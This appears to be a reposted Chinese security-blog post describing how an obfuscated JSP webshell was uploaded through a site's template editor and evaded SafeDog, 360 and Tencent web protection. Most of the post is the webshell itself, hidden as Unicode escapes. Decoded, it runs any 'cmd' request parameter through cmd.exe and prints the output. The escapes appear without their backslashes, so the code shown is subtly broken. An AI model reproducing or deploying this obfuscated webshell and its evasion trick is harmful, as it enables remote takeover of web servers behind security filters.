【奇技淫巧】分享个过狗、360网站卫士、JSP Webshell

admin
admin
admin
102613
文章
87
评论
2021年7月29日01:15:43评论126 views字数 2728阅读9分5秒阅读模式

【奇技淫巧】分享个过狗、360网站卫士、JSP Webshell

前在一次项目中,发现后台可以编辑网站模板,经过一波怼,发现几乎上传不上

由于JSP 的content-type 类型为 text/html
故利用这个特性 采用html中的Unicode 16进制编码 成功 上传,后查看进程 发现存在360网站卫士、腾讯网站防护..

<%@ page import="java.util.*,java.io.*,java.net.*"%>

<%
u0069u0066u0020u0028u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u006du0064u0022u0029u0020u0021u003du0020u006eu0075u006cu006cu0029u0020u007bu000au0020u0020u0020u0020u0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0022u0043u006fu006du006du0061u006eu0064u003au0020u0022u0020u002bu0020u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u006du0064u0022u0029u0020u002bu0020u0022u005cu006eu003cu0042u0052u003eu0022u0029u003bu000au0020u0020u0020u0020u0020u0020u0020u0020u0050u0072u006fu0063u0065u0073u0073u0020u0070u0020u003du0020u0052u0075u006eu0074u0069u006du0065u002eu0067u0065u0074u0052u0075u006eu0074u0069u006du0065u0028u0029u002eu0065u0078u0065u0063u0028u0022u0063u006du0064u002eu0065u0078u0065u0020u002fu0063u0020u0022u0020u002bu0020u0072u0065u0071u0075u0065u0073u0074u002eu0067u0065u0074u0050u0061u0072u0061u006du0065u0074u0065u0072u0028u0022u0063u006du0064u0022u0029u0029u003bu000au0020u0020u0020u0020u0020u0020u0020u0020u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0020u006fu0073u0020u003du0020u0070u002eu0067u0065u0074u004fu0075u0074u0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu000au0020u0020u0020u0020u0020u0020u0020u0020u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0069u006eu0020u003du0020u0070u002eu0067u0065u0074u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0029u003bu000au0020u0020u0020u0020u0020u0020u0020u0020u0044u0061u0074u0061u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0020u0064u0069u0073u0020u003du0020u006eu0065u0077u0020u0044u0061u0074u0061u0049u006eu0070u0075u0074u0053u0074u0072u0065u0061u006du0028u0069u006eu0029u003bu000au0020u0020u0020u0020u0020u0020u0020u0020u0053u0074u0072u0069u006eu0067u0020u0064u0069u0073u0072u0020u003du0020u0064u0069u0073u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u003bu000au0020u0020u0020u0020u0020u0020u0020u0020u0077u0068u0069u006cu0065u0020u0028u0020u0064u0069u0073u0072u0020u0021u003du0020u006eu0075u006cu006cu0020u0029u0020u007bu000au0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u006fu0075u0074u002eu0070u0072u0069u006eu0074u006cu006eu0028u0064u0069u0073u0072u0029u003bu0020u0064u0069u0073u0072u0020u003du0020u0064u0069u0073u002eu0072u0065u0061u0064u004cu0069u006eu0065u0028u0029u003bu0020u007du000au0020u0020u0020u0020u0020u0020u0020u0020u007d
%>



【奇技淫巧】分享个过狗、360网站卫士、JSP Webshell



马并不重要、这里重要提供一种思路 【奇技淫巧】分享个过狗、360网站卫士、JSP Webshell


【奇技淫巧】分享个过狗、360网站卫士、JSP Webshell

本文始发于微信公众号(T00ls):【奇技淫巧】分享个过狗、360网站卫士、JSP Webshell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月29日01:15:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【奇技淫巧】分享个过狗、360网站卫士、JSP Webshellhttps://cn-sec.com/archives/348881.html

发表评论

匿名网友 填写信息